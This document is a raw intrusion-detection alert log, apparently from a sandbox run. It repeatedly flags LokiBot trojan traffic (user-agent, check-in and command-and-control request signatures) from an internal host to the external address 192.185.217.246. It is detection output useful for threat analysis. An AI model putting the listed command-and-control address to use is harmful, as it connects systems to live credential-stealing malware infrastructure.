                                11/22/21-15:32:54.224289TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.11.20192.185.217.246
                                11/22/21-15:32:54.224289TCP2025381ET TROJAN LokiBot Checkin5005880192.168.11.20192.185.217.246
                                11/22/21-15:32:54.224289TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.11.20192.185.217.246
                                11/22/21-15:32:55.050179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.11.20192.185.217.246
                                11/22/21-15:32:55.050179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.11.20192.185.217.246
                                11/22/21-15:32:55.050179TCP2025381ET TROJAN LokiBot Checkin5005980192.168.11.20192.185.217.246
                                11/22/21-15:32:55.050179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.11.20192.185.217.246
                                11/22/21-15:32:55.835921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.11.20192.185.217.246
                                11/22/21-15:32:55.835921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.11.20192.185.217.246
                                11/22/21-15:32:55.835921TCP2025381ET TROJAN LokiBot Checkin5006080192.168.11.20192.185.217.246
                                11/22/21-15:32:55.835921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.11.20192.185.217.246
                                11/22/21-15:32:56.657881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.11.20192.185.217.246
                                11/22/21-15:32:56.657881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.11.20192.185.217.246
                                11/22/21-15:32:56.657881TCP2025381ET TROJAN LokiBot Checkin5006180192.168.11.20192.185.217.246
                                11/22/21-15:32:56.657881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.11.20192.185.217.246
                                11/22/21-15:32:57.466423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.11.20192.185.217.246
                                11/22/21-15:32:57.466423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.11.20192.185.217.246
                                11/22/21-15:32:57.466423TCP2025381ET TROJAN LokiBot Checkin5006280192.168.11.20192.185.217.246
                                11/22/21-15:32:57.466423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.11.20192.185.217.246
                                11/22/21-15:32:58.303223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.11.20192.185.217.246
                                11/22/21-15:32:58.303223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.11.20192.185.217.246
                                11/22/21-15:32:58.303223TCP2025381ET TROJAN LokiBot Checkin5006380192.168.11.20192.185.217.246
                                11/22/21-15:32:58.303223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.11.20192.185.217.246
                                11/22/21-15:32:59.119810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.11.20192.185.217.246
                                11/22/21-15:32:59.119810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.11.20192.185.217.246
                                11/22/21-15:32:59.119810TCP2025381ET TROJAN LokiBot Checkin5006480192.168.11.20192.185.217.246
                                11/22/21-15:32:59.119810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.11.20192.185.217.246
                                11/22/21-15:32:59.953023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.11.20192.185.217.246
                                11/22/21-15:32:59.953023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.11.20192.185.217.246
                                11/22/21-15:32:59.953023TCP2025381ET TROJAN LokiBot Checkin5006580192.168.11.20192.185.217.246
                                11/22/21-15:32:59.953023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.11.20192.185.217.246
                                11/22/21-15:33:00.747914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.11.20192.185.217.246
                                11/22/21-15:33:00.747914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.11.20192.185.217.246
                                11/22/21-15:33:00.747914TCP2025381ET TROJAN LokiBot Checkin5006680192.168.11.20192.185.217.246
                                11/22/21-15:33:00.747914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.11.20192.185.217.246
                                11/22/21-15:33:01.578874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.11.20192.185.217.246
                                11/22/21-15:33:01.578874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.11.20192.185.217.246
                                11/22/21-15:33:01.578874TCP2025381ET TROJAN LokiBot Checkin5006780192.168.11.20192.185.217.246
                                11/22/21-15:33:01.578874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.11.20192.185.217.246
                                11/22/21-15:33:02.388015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.11.20192.185.217.246
                                11/22/21-15:33:02.388015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.11.20192.185.217.246
                                11/22/21-15:33:02.388015TCP2025381ET TROJAN LokiBot Checkin5006880192.168.11.20192.185.217.246
                                11/22/21-15:33:02.388015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.11.20192.185.217.246
                                11/22/21-15:33:03.175165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.11.20192.185.217.246
                                11/22/21-15:33:03.175165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.11.20192.185.217.246
                                11/22/21-15:33:03.175165TCP2025381ET TROJAN LokiBot Checkin5006980192.168.11.20192.185.217.246
                                11/22/21-15:33:03.175165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.11.20192.185.217.246
                                11/22/21-15:33:03.986134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.11.20192.185.217.246
                                11/22/21-15:33:03.986134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.11.20192.185.217.246
                                11/22/21-15:33:03.986134TCP2025381ET TROJAN LokiBot Checkin5007080192.168.11.20192.185.217.246
                                11/22/21-15:33:03.986134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.11.20192.185.217.246
                                11/22/21-15:33:04.809222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.11.20192.185.217.246
                                11/22/21-15:33:04.809222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.11.20192.185.217.246
                                11/22/21-15:33:04.809222TCP2025381ET TROJAN LokiBot Checkin5007180192.168.11.20192.185.217.246
                                11/22/21-15:33:04.809222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.11.20192.185.217.246
                                11/22/21-15:33:05.633001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.11.20192.185.217.246
                                11/22/21-15:33:05.633001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.11.20192.185.217.246
                                11/22/21-15:33:05.633001TCP2025381ET TROJAN LokiBot Checkin5007280192.168.11.20192.185.217.246
                                11/22/21-15:33:05.633001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.11.20192.185.217.246
                                11/22/21-15:33:06.452882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.11.20192.185.217.246
                                11/22/21-15:33:06.452882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.11.20192.185.217.246
                                11/22/21-15:33:06.452882TCP2025381ET TROJAN LokiBot Checkin5007380192.168.11.20192.185.217.246
                                11/22/21-15:33:06.452882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.11.20192.185.217.246
                                11/22/21-15:33:07.295714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.11.20192.185.217.246
                                11/22/21-15:33:07.295714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.11.20192.185.217.246
                                11/22/21-15:33:07.295714TCP2025381ET TROJAN LokiBot Checkin5007480192.168.11.20192.185.217.246
                                11/22/21-15:33:07.295714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.11.20192.185.217.246
                                11/22/21-15:33:08.132693TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.11.20192.185.217.246
                                11/22/21-15:33:08.132693TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.11.20192.185.217.246
                                11/22/21-15:33:08.132693TCP2025381ET TROJAN LokiBot Checkin5007580192.168.11.20192.185.217.246
                                11/22/21-15:33:08.132693TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.11.20192.185.217.246
                                11/22/21-15:33:08.993364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.11.20192.185.217.246
                                11/22/21-15:33:08.993364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.11.20192.185.217.246
                                11/22/21-15:33:08.993364TCP2025381ET TROJAN LokiBot Checkin5007680192.168.11.20192.185.217.246
                                11/22/21-15:33:08.993364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.11.20192.185.217.246
                                11/22/21-15:33:09.792370TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.11.20192.185.217.246
                                11/22/21-15:33:09.792370TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.11.20192.185.217.246
                                11/22/21-15:33:09.792370TCP2025381ET TROJAN LokiBot Checkin5007780192.168.11.20192.185.217.246
                                11/22/21-15:33:09.792370TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.11.20192.185.217.246
                                11/22/21-15:33:10.625210TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.11.20192.185.217.246
                                11/22/21-15:33:10.625210TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.11.20192.185.217.246
                                11/22/21-15:33:10.625210TCP2025381ET TROJAN LokiBot Checkin5007880192.168.11.20192.185.217.246
                                11/22/21-15:33:10.625210TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.11.20192.185.217.246
                                11/22/21-15:33:11.443375TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.11.20192.185.217.246
                                11/22/21-15:33:11.443375TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.11.20192.185.217.246
                                11/22/21-15:33:11.443375TCP2025381ET TROJAN LokiBot Checkin5007980192.168.11.20192.185.217.246
                                11/22/21-15:33:11.443375TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.11.20192.185.217.246
                                11/22/21-15:33:12.322069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.11.20192.185.217.246
                                11/22/21-15:33:12.322069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.11.20192.185.217.246
                                11/22/21-15:33:12.322069TCP2025381ET TROJAN LokiBot Checkin5008080192.168.11.20192.185.217.246
                                11/22/21-15:33:12.322069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.11.20192.185.217.246
                                11/22/21-15:33:13.175936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.11.20192.185.217.246
                                11/22/21-15:33:13.175936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.11.20192.185.217.246
                                11/22/21-15:33:13.175936TCP2025381ET TROJAN LokiBot Checkin5008180192.168.11.20192.185.217.246
                                11/22/21-15:33:13.175936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.11.20192.185.217.246
                                11/22/21-15:33:13.956513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.11.20192.185.217.246
                                11/22/21-15:33:13.956513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.11.20192.185.217.246
                                11/22/21-15:33:13.956513TCP2025381ET TROJAN LokiBot Checkin5008280192.168.11.20192.185.217.246
                                11/22/21-15:33:13.956513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.11.20192.185.217.246
                                11/22/21-15:33:14.782492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.11.20192.185.217.246
                                11/22/21-15:33:14.782492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.11.20192.185.217.246
                                11/22/21-15:33:14.782492TCP2025381ET TROJAN LokiBot Checkin5008380192.168.11.20192.185.217.246
                                11/22/21-15:33:14.782492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.11.20192.185.217.246
                                11/22/21-15:33:15.609858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008480192.168.11.20192.185.217.246
                                11/22/21-15:33:15.609858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008480192.168.11.20192.185.217.246
                                11/22/21-15:33:15.609858TCP2025381ET TROJAN LokiBot Checkin5008480192.168.11.20192.185.217.246
                                11/22/21-15:33:15.609858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008480192.168.11.20192.185.217.246
                                11/22/21-15:33:16.409139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008580192.168.11.20192.185.217.246
                                11/22/21-15:33:16.409139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008580192.168.11.20192.185.217.246
                                11/22/21-15:33:16.409139TCP2025381ET TROJAN LokiBot Checkin5008580192.168.11.20192.185.217.246
                                11/22/21-15:33:16.409139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008580192.168.11.20192.185.217.246
                                11/22/21-15:33:17.247523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008680192.168.11.20192.185.217.246
                                11/22/21-15:33:17.247523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008680192.168.11.20192.185.217.246
                                11/22/21-15:33:17.247523TCP2025381ET TROJAN LokiBot Checkin5008680192.168.11.20192.185.217.246
                                11/22/21-15:33:17.247523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008680192.168.11.20192.185.217.246
                                11/22/21-15:33:18.021826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008780192.168.11.20192.185.217.246
                                11/22/21-15:33:18.021826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008780192.168.11.20192.185.217.246
                                11/22/21-15:33:18.021826TCP2025381ET TROJAN LokiBot Checkin5008780192.168.11.20192.185.217.246
                                11/22/21-15:33:18.021826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008780192.168.11.20192.185.217.246
                                11/22/21-15:33:18.892767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008880192.168.11.20192.185.217.246
                                11/22/21-15:33:18.892767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008880192.168.11.20192.185.217.246
                                11/22/21-15:33:18.892767TCP2025381ET TROJAN LokiBot Checkin5008880192.168.11.20192.185.217.246
                                11/22/21-15:33:18.892767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008880192.168.11.20192.185.217.246
                                11/22/21-15:33:19.675423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008980192.168.11.20192.185.217.246
                                11/22/21-15:33:19.675423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008980192.168.11.20192.185.217.246
                                11/22/21-15:33:19.675423TCP2025381ET TROJAN LokiBot Checkin5008980192.168.11.20192.185.217.246
                                11/22/21-15:33:19.675423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008980192.168.11.20192.185.217.246
                                11/22/21-15:33:20.509338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009080192.168.11.20192.185.217.246
                                11/22/21-15:33:20.509338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009080192.168.11.20192.185.217.246
                                11/22/21-15:33:20.509338TCP2025381ET TROJAN LokiBot Checkin5009080192.168.11.20192.185.217.246
                                11/22/21-15:33:20.509338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009080192.168.11.20192.185.217.246
                                11/22/21-15:33:21.394518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009180192.168.11.20192.185.217.246
                                11/22/21-15:33:21.394518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009180192.168.11.20192.185.217.246
                                11/22/21-15:33:21.394518TCP2025381ET TROJAN LokiBot Checkin5009180192.168.11.20192.185.217.246
                                11/22/21-15:33:21.394518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009180192.168.11.20192.185.217.246
                                11/22/21-15:33:22.175357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009280192.168.11.20192.185.217.246
                                11/22/21-15:33:22.175357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009280192.168.11.20192.185.217.246
                                11/22/21-15:33:22.175357TCP2025381ET TROJAN LokiBot Checkin5009280192.168.11.20192.185.217.246
                                11/22/21-15:33:22.175357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009280192.168.11.20192.185.217.246
                                11/22/21-15:33:22.988471TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009380192.168.11.20192.185.217.246
                                11/22/21-15:33:22.988471TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009380192.168.11.20192.185.217.246
                                11/22/21-15:33:22.988471TCP2025381ET TROJAN LokiBot Checkin5009380192.168.11.20192.185.217.246
                                11/22/21-15:33:22.988471TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009380192.168.11.20192.185.217.246
                                11/22/21-15:33:23.860253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009480192.168.11.20192.185.217.246
                                11/22/21-15:33:23.860253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009480192.168.11.20192.185.217.246
                                11/22/21-15:33:23.860253TCP2025381ET TROJAN LokiBot Checkin5009480192.168.11.20192.185.217.246
                                11/22/21-15:33:23.860253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009480192.168.11.20192.185.217.246
                                11/22/21-15:33:24.729919TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009580192.168.11.20192.185.217.246
                                11/22/21-15:33:24.729919TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009580192.168.11.20192.185.217.246
                                11/22/21-15:33:24.729919TCP2025381ET TROJAN LokiBot Checkin5009580192.168.11.20192.185.217.246
                                11/22/21-15:33:24.729919TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009580192.168.11.20192.185.217.246
                                11/22/21-15:33:25.629944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009680192.168.11.20192.185.217.246
                                11/22/21-15:33:25.629944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009680192.168.11.20192.185.217.246
                                11/22/21-15:33:25.629944TCP2025381ET TROJAN LokiBot Checkin5009680192.168.11.20192.185.217.246
                                11/22/21-15:33:25.629944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009680192.168.11.20192.185.217.246
                                11/22/21-15:33:26.463909TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009780192.168.11.20192.185.217.246
                                11/22/21-15:33:26.463909TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009780192.168.11.20192.185.217.246
                                11/22/21-15:33:26.463909TCP2025381ET TROJAN LokiBot Checkin5009780192.168.11.20192.185.217.246
                                11/22/21-15:33:26.463909TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009780192.168.11.20192.185.217.246
                                11/22/21-15:33:27.323533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009880192.168.11.20192.185.217.246
                                11/22/21-15:33:27.323533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009880192.168.11.20192.185.217.246
                                11/22/21-15:33:27.323533TCP2025381ET TROJAN LokiBot Checkin5009880192.168.11.20192.185.217.246
                                11/22/21-15:33:27.323533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009880192.168.11.20192.185.217.246
                                11/22/21-15:33:28.132784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009980192.168.11.20192.185.217.246
                                11/22/21-15:33:28.132784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009980192.168.11.20192.185.217.246
                                11/22/21-15:33:28.132784TCP2025381ET TROJAN LokiBot Checkin5009980192.168.11.20192.185.217.246
                                11/22/21-15:33:28.132784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009980192.168.11.20192.185.217.246
                                11/22/21-15:33:28.950678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010080192.168.11.20192.185.217.246
                                11/22/21-15:33:28.950678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010080192.168.11.20192.185.217.246
                                11/22/21-15:33:28.950678TCP2025381ET TROJAN LokiBot Checkin5010080192.168.11.20192.185.217.246
                                11/22/21-15:33:28.950678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010080192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010180192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2025381ET TROJAN LokiBot Checkin5010180192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2025381ET TROJAN LokiBot Checkin5010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2025381ET TROJAN LokiBot Checkin5010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2025381ET TROJAN LokiBot Checkin5010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2025381ET TROJAN LokiBot Checkin5010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2025381ET TROJAN LokiBot Checkin5010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2025381ET TROJAN LokiBot Checkin5010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2025381ET TROJAN LokiBot Checkin5010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2025381ET TROJAN LokiBot Checkin5010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2025381ET TROJAN LokiBot Checkin5011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2025381ET TROJAN LokiBot Checkin5011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2025381ET TROJAN LokiBot Checkin5011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2025381ET TROJAN LokiBot Checkin5011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2025381ET TROJAN LokiBot Checkin5011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2025381ET TROJAN LokiBot Checkin5011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2025381ET TROJAN LokiBot Checkin5011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.11.20192.185.217.246
